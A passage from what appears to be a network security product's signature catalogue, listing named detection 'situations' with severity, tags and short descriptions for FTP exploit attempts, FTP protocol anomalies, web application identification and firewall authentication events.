Tags: Any Operating System, Any Hardware, Computer Associates eTrust Secure Content Manager, CVE2003, CVE2008, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-382-4219
Vulnerability: CA-eTrust-Secure-Content-Manager-Gateway-FTP-Pasv-Stack-Overflow
LeapWare-LeapFTP-Pasv-Reply-Buffer-Overflow
Description:
Back to top

FTP_SS-Curl-Client-Error-BOF

About this situation: Curl client error buffer overflow
Context: FTP Server Stream
Severity: 10
Tags: Linux, x86, curl ftp client, CVE2000, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-516-5211
Vulnerability: FTP-Curl-Client-Error-BOF
Description:
Back to top

FTP_SS-Failed-Login

About this situation: Failed FTP login attempt detected
Context: FTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic FTP server, Any Operating System not specific, Generic FTP server not specific, Failed Login, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: FTP-Failed-Login
Description:
Back to top

FTP_SS-FlashGet-FTP-Pwd-Command-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in FlashGet detected
Context: FTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, FlashGet, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: FlashGet-FTP-Pwd-Command-Stack-Buffer-Overflow
Description:
Back to top

FTP_SS-FTPShell-Client-Enterprise-Edition-Stack-Buffer-Overflow

About this situation: A vulnerability in FTPShell Client Enterprise Edition
Context: FTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, FTPShell, CVE2018, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1111-5242
Vulnerability: FTPShell-Client-Enterprise-Edition-Stack-Buffer-Overflow
Description:
Back to top

FTP_SS-Ipswitch-WS_FTP-Client-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in Ipswitch WS_FTP Home detected
Context: FTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WS_FTP Professional, WS_FTP Home, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-445-4219
Vulnerability: Ipswitch-WS_FTP-Client-Format-String-Vulnerability
Description:
Back to top

FTP_SS-Microsoft-Internet-Explorer-FTP-Response-Parsing-Memory-Corruption

About this situation: Detects memory corruption exploits against Internet Explorer
Context: FTP Server Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2007-02, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-188-2032
Vulnerability: FTP-Microsoft-Internet-Explorer-FTP-Response-Parsing-Memory-Corruption
Description:
Back to top

FTP_SS-Phatbot-Trojan-Infection

About this situation: Detected Phatbot Trojan Infection
Context: FTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Phatbot-Trojan
Description:
Back to top

FTP_SS-ProFTP-Banner-Remote-Buffer-Overflow

About this situation: An attempt to exploit a ProFTP Banner Remote Buffer Overflow vulnerability detected.
Context: FTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ProFTP, CVE2009, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-725-5211
Vulnerability: ProFTP-Banner-Remote-Buffer-Overflow
Description:
Back to top

FTP_SS-ProFTPD-Anonymous-Access-Granted

About this situation: Anonymous access has been granted on ProFTPd
Context: FTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, ProFTPD, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Description:
Back to top

FTP_SS-Shared-Variables

About this situation: Fingerprints that set variables shared between multiple fingerprints
Context: FTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1323-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

FTP_SS-Trellian-FTP-Client-Remote-Buffer-Overflow

About this situation: An attempt to exploit a Trellian FTP Client Remote Buffer Overflow vulnerability detected.
Context: FTP Server Stream
Severity: 7
Tags: Windows XP, Any Hardware, Trellian FTP Client, CVE2010, Windows XP not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-721-5211
Last changed: sgpkg-ips-721-5211
Vulnerability: Trellian-FTP-Client-Remote-Buffer-Overflow
Description:
Back to top

FTP_SS-Vandyke-AbsoluteFTP-Buffer-Overflow

About this situation: An attempt to exploit a Vandyke AbsoluteFTP Buffer Overflow vulnerability detected.
Context: FTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, VanDyke AbsoluteFTP, CVE2011, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Vulnerability: Vandyke-AbsoluteFTP-Buffer-Overflow
Description:
Back to top

FTP_SS-Your-Freedom-FTP-Packet

About this situation: A Your Freedom FTP packet detected
Context: FTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Your Freedom, Any Operating System not specific, Tunneling Protocols, TCP Server Traffic
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-769-5211
Vulnerability: Your-Freedom-Network-Usage
Description:
Back to top

FTP_State-Wrong-At-EOF

About this situation: Abnormal termination of FTP control connection detected
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: An abnormal termination of an FTP control connection was detected. The control connection should be terminated only after an accepting the server reply to the QUIT command. Risk analysis: Risk level is fairly low.
Back to top

FTP_Synchronization-Lost

About this situation: Synchronization between FTP commands and replies was lost
Context: FTP Synchronization Lost
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The synchronization between FTP client commands and server replies was lost. This means that for some reason, the connection was not fully analysed. Possible reasons include but are not limited to: loss of traffic, too much traffic, attack. Risk analysis: Risk level is fairly low.
Back to top

FTP_Telnet-Interrupt

About this situation: Telnet interrupt detected in FTP control connection
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: A telnet interrupt was detected in an FTP control connection. When the client interrupts a data transfer, a Telnet interrupt is sent first to make sure that the server does not wait until the end of data transfer before reading the next command. In this case, the next command is normally ABOR. Risk analysis: Risk level is fairly low. If this situation occurs very often, it may indicate suspicious activity.
Back to top

FTP_Transfer-Data-Direction-Invalid

About this situation: Data transferred in wrong direction
Context: FTP without parameters
Severity: 2
Tags: Attack Related Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: A file upload command was given but the data was transferred from the server to the client. Alternatively, a file download or directory listing command was given but the data was transferred from the client to the server in the data connection. This should not happen in a valid FTP session. Risk analysis: Risk level is medium. This may indicate suspicious activity.
Back to top

FTP_Transfer-Data-Premature

About this situation: Premature data transfer detected
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Data was transferred in the data connection before a data transfer command was given in the control connection. Risk analysis: Risk level is medium. This should not happen in any valid FTP session between a real FTP client and a server.
Back to top

FTP_Transfer-Extra-Data

About this situation: Data transfer detected in data connection after transfer command was terminated
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: A data transfer was detected in the data connection after the transfer command was terminated. Normally, the FTP stream mode is used in FTP data transfer. The end of a transferred file is signaled by closing the data connection. This situation was generated because data was still transferred in the data connection even though the data transfer command was already terminated in the control connection. Risk analysis: Risk level is medium.
Back to top

FTP_Transfer-Mode-Active

About this situation: FTP data transfer using active mode attempted
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP data transfer (file upload, download or directory listing) using active mode was attempted. This is a normal FTP operation. However, depending on the network configuration, system administrators may want to disable the active mode on some servers. Risk analysis: Risk level is fairly low.
Back to top

FTP_Transfer-Mode-Active-Success

About this situation: FTP active mode data transfer not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP data transfer (file upload, download or directory listing) using active mode was not refused by the server. This is a normal FTP operation. However, depending on the network configuration, system administrators may want to disable the active mode on some servers. In such cases the server should send an error message when active mode data transfer is attempted. This event is generated when such an error message is not seen. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Transfer-Mode-Default

About this situation: FTP data transfer using default mode attempted
Context: FTP without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP data transfer using the default mode was attempted. FTP data transfer (file upload, download or directory listing) using the default mode is an obsolete FTP feature. It should not be used between current FTP clients and servers because in default mode it is not possible to open a new data connection shortly after the previous connection was closed. Risk analysis: Risk level is fairly low.
Back to top

FTP_Transfer-Mode-Default-Success

About this situation: FTP data transfer using default mode not refused by server
Context: FTP without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP data transfer using the default mode was not refused by the server. FTP data transfer (file upload, download or directory listing) using the default mode is an obsolete FTP feature. It should not be used between current FTP clients and servers, because in default mode it is not possible to open a new data connection shortly after the previous one was closed. This event was generated because the server did not give an error reply to the data transfer command using the default mode. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Transfer-Mode-Passive

About this situation: FTP data transfer using passive mode detected
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: FTP data transfer using passive mode was detected. FTP data transfer (file upload, download or directory listing) using passive mode is a normal FTP operation. However, depending on the network configuration, system administrators may want to disable the passive mode on some servers. Risk analysis: Risk level is fairly low.
Back to top

FTP_Transfer-Mode-Passive-Success

About this situation: FTP passive mode data transfer not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: An FTP passive mode data transfer was not refused by server. FTP data transfer (file upload, download or directory listing) using passive mode is a normal FTP operation. However, depending on the network configuration, system administrators may want to disable the passive mode on some servers. In such cases the server should send an error message when passive mode data transfer is attempted. This event is generated when such an error message is not seen. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Transfer-No-Data

About this situation: FTP session without a data transfer was detected
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: An FTP session ended before any files were uploaded or downloaded, or any directory listings were retrieved. Risk analysis: Risk level is fairly low.
Back to top

FTP_UL-Excessively-Long-Asp-Include-File-Argument

About this situation: Detects an excessively long ASP include file argument
Context: FTP Upload Stream
Severity: 7
Tags: Windows, x86, IIS, MS2006-07, CVE2006, Windows not specific, IIS not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-73-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-IIS-Server-Crafted-Asp-Page-Buffer-Overflow
Description:
Back to top

FTP_UL-Executable-File-Upload

About this situation: Executable file detected
Context: FTP Upload Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-215-2032
Last changed: sgpkg-ips-1406-5242
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

FTP_Upload-Command

About this situation: FTP client gave file upload command
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The FTP client tried to upload a file using the FTP STOU, STOR, or APPE command. This a normal action on many FTP connections. The defined security policy may forbid uploading a file on some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_Upload-Command-Success

About this situation: FTP server did not send error reply when FTP client gave file upload command
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The FTP client tried to upload a file using the FTP STOU, STOR, or APPE command. This a normal action on many FTP connections. The defined security policy may forbid uploading a file on some FTP connections. This event was generated because the server did not give an error reply when the FTP client gave a file upload command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_USER-Too-Long-Success

About this situation: FTP USER command with too long username not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP USER command that used too long a username. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

Fubo.tv

About this situation: Fubo.tv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1540-5242
Last changed: sgpkg-ips-1769-5242
Description: Fubo.tv is an media streaming service.
Back to top

FuelQuest

About this situation: Application FuelQuest detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FuelQuest provides on-demand, web-based supply chain management and tax automation software and services for fuel suppliers, distributors and buyers in global downstream energy.
Back to top

FUID_Cannot_connect

About this situation: Cannot connect to server
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Cannot query user information from any of the defined servers. Possible causes include connectivity issues, configuration issues and server internal issues. Activate diagnostics for more detailed information.
Back to top

FUID_Connection_Restored

About this situation: Server connection restored
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Server connectivity has returned to normal after disconnection.
Back to top

FUID_Diagnostic_Error

About this situation: Diagnostic error message
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Diagnostic error message. See Information Message field for details.
Back to top

FUID_Diagnostic_Info

About this situation: Diagnostic info message
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Diagnostic message. See Information Message field for details.
Back to top

Fujisoft

About this situation: Application Fujisoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fujisoft Technology, being platform and vendor agonostic, is a provider of quality information technology services.
Back to top

Fujitsu

About this situation: Application Fujitsu detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fujitsu is a provider of IT products and services for the global marketplace including hardware, software, networking, business solutions, and more.
Back to top

Full-Tilt-Poker

About this situation: Full Tilt Poker usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

FullContact

About this situation: Application FullContact detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FullContact is contact management platform for professionals and enterprises who need to master their contacts.
Back to top

Fulldls.com

About this situation: Fulldls.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

FullStory

About this situation: Application FullStory detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FullStory lets product and support teams understand customer experience. FullStory captures users event.
Back to top

Fun-Trivia

About this situation: Fun Trivia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

FunBeat

About this situation: Application FunBeat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FunBeat is a training diary and the community, for maximum inspiration for your running, cycling, weight lifting, etc.
Back to top

Funbrain

About this situation: Funbrain usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Function-Point

About this situation: Application Function-Point detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Function Point is a cloud-based productivity system that's designed specifically for advertising creative agencies.
Back to top

Functionfox

About this situation: FunctionFox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Track time and expenses, keep to estimate, and easily manage your clients and projects.
Back to top

Fundingroadmap

About this situation: Application Fundingroadmap detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Funding Roadmap is cloud based business plan and due diligence reporting system platform set to revolutionize the way entrepreneurs.
Back to top

Fundtech

About this situation: Application Fundtech detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fundtech is a provider of financial technology to banks and corporations of all sizes in the Americas, EMEA, and Asia-Pacific.
Back to top

Funnel.io

About this situation: Application Funnel.io detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Funnel is an advertising analytics platform combining advertising data with conversion data for analysis and reporting across advertising channels.
Back to top

Funny-or-Die

About this situation: Application Funny-or-Die detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Funny or Die is a comedy video website.
Back to top

Funshion

About this situation: Funshion usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A video streaming site
Back to top

Fusebill

About this situation: Application Fusebill detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fusebill simplifies subscription and billing management by automating many manual accounting and financial processes and workflows.
Back to top

Fusemail

About this situation: Application Fusemail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fusemail is a business email hosting provider.
Back to top

Fusionio

About this situation: Application Fusionio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fusion-io offers a platform that accelerates databases, virtualization, cloud computing, big data and applications that drive the economy.
Back to top

FusionLive

About this situation: Application FusionLive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fusion is a news, pop culture and satire TV and digital network.
Back to top

FuturelabsCRM

About this situation: Application FuturelabsCRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Futurelabs CRM makes it easy to gain sales, keep up with customers and help your team to increase sales.
Back to top

Fuze

About this situation: Application Fuze detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fuze is visual communications solution that brings people together and helps organizations stay better connected across any device, down the hall or around the world. Fuze is compatible with PC, Mac, iOS, and Android devices.
Back to top

Fuze-Meeting

About this situation: Fuze Meeting usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description: Fuze Meeting is an online meeting, video conferencing and collaboration software package that enables users to host and attend web based conferences and share their desktop screen with other remote users via the web and mobile devices. Fuze Meetings cloud uploading capabilities makes it easy to share documents when hosting a meeting on a mobile device in real time. Source: Wikipedia
Back to top

FW_Accounting-VPN-Traffic

About this situation: VPN traffic
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: VPN traffic.
Back to top

FW_Authentication-Authentication-Failed

About this situation: Authentication failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Authentication failed.
Back to top

FW_Authentication-Authentication-Removed-From

About this situation: Authentication removed from
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Authentication removed from.
Back to top

FW_Authentication-Authentication-Server-Does-Not-Respond

About this situation: Authentication Server does not respond
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Authentication Server does not respond.
Back to top

FW_Authentication-Authentication-Service-Started

About this situation: Authentication service started
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Authentication service started.
Back to top

FW_Authentication-Authentication-Succeeded

About this situation: Authentication succeeded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Authentication succeeded.
Back to top

FW_Authentication-Client-Connection-Failed

About this situation: Client connection failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Client connection failed.
Back to top

FW_Authentication-Client-initiated-Authentication-From

About this situation: Client-initiated authentication from
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Client-initiated authentication from.
Back to top

FW_Authentication-Debug

About this situation: Debug
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Debug.
Back to top

FW_Authentication-Error-In-Initialization

About this situation: Error in initialization
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Error in initialization.
Back to top

FW_Authentication-Error-In-Receiving-A-New-Configuration

About this situation: Error in receiving a new configuration
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Error in receiving a new configuration.
Back to top

FW_Authentication-Firewall-initiated-Authentication-To

About this situation: Firewall-initiated authentication to
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Firewall-initiated authentication to.
Back to top

FW_Authentication-Internal-Engine-Error

About this situation: Internal engine error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Internal engine error.
Back to top

FW_Authentication-IPsec-Certificate-Authentication-From

About this situation: IPsec certificate authentication from
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec certificate authentication from.
Back to top

FW_Authentication-IPsec-Client-Cfg-Download-Done

About this situation: IPsec client cfg download done
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec client cfg download done.
Back to top

FW_Authentication-IPsec-Client-Cfg-Download-Failed

About this situation: IPsec client cfg download failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec client cfg download failed.
Back to top

FW_Authentication-IPsec-Client-Cfg-Download-From

About this situation: IPsec client cfg download from
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec client cfg download from.
Back to top

FW_Authentication-IPsec-Hybrid-Authentication-From

About this situation: IPsec hybrid authentication from
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec hybrid authentication from.
Back to top

FW_Authentication-Kernel-Usertable

About this situation: Kernel usertable
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Kernel usertable.
Back to top

FW_Authentication-LDAP-Server-Does-Not-Respond

About this situation: LDAP Server does not respond
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: LDAP Server does not respond.
Back to top

FW_Authentication-New-Configuration-Successfully-Installed

About this situation: New configuration successfully installed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: New configuration successfully installed.
Back to top

FW_Authentication-User-Domain-And-Authentication-Service

About this situation: User, domain and authentication service
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: User, domain and authentication service.
Back to top

FW_Authentication-User-ID

About this situation: User ID
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: User ID.
Back to top

FW_BBA-User-logged-in

About this situation: Browser based authentication recorded successfull user login
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: User has performed a successfull login via browser based authentication subsystem.
Back to top

FW_BBA-User-logged-out

About this situation: Browser based authentication recorded user logout
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: User has performed a successfull logout via browser based authentication subsystem.
Back to top

FW_BBA-User-login-failed

About this situation: Browser based authentication recorded an unsuccessfull user login attempt
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: There was an unsuccessful login attempt via browser based authentication subsystem.
Back to top

FW_BBA-User-went-offline

About this situation: Browser-based user authentication feature logged user off automatically
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: The browser-based user authentication feature has automatically logged this user off due to an authentication time-out or authentication idle time-out, because the status page operating in keep-alive mode was closed in the client browser, or because the client browser lost the connection to the engine.
Back to top

FW_Cluster-Protocol-Cluster-Protocol-Authentication-Upgraded

About this situation: Cluster protocol authentication upgraded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Cluster protocol authentication upgraded.
Back to top

FW_Cluster-Protocol-Cluster-Protocol-Debug

About this situation: Cluster protocol debug
Context: Firewall Events
Severity: 1
Tags: NGFW
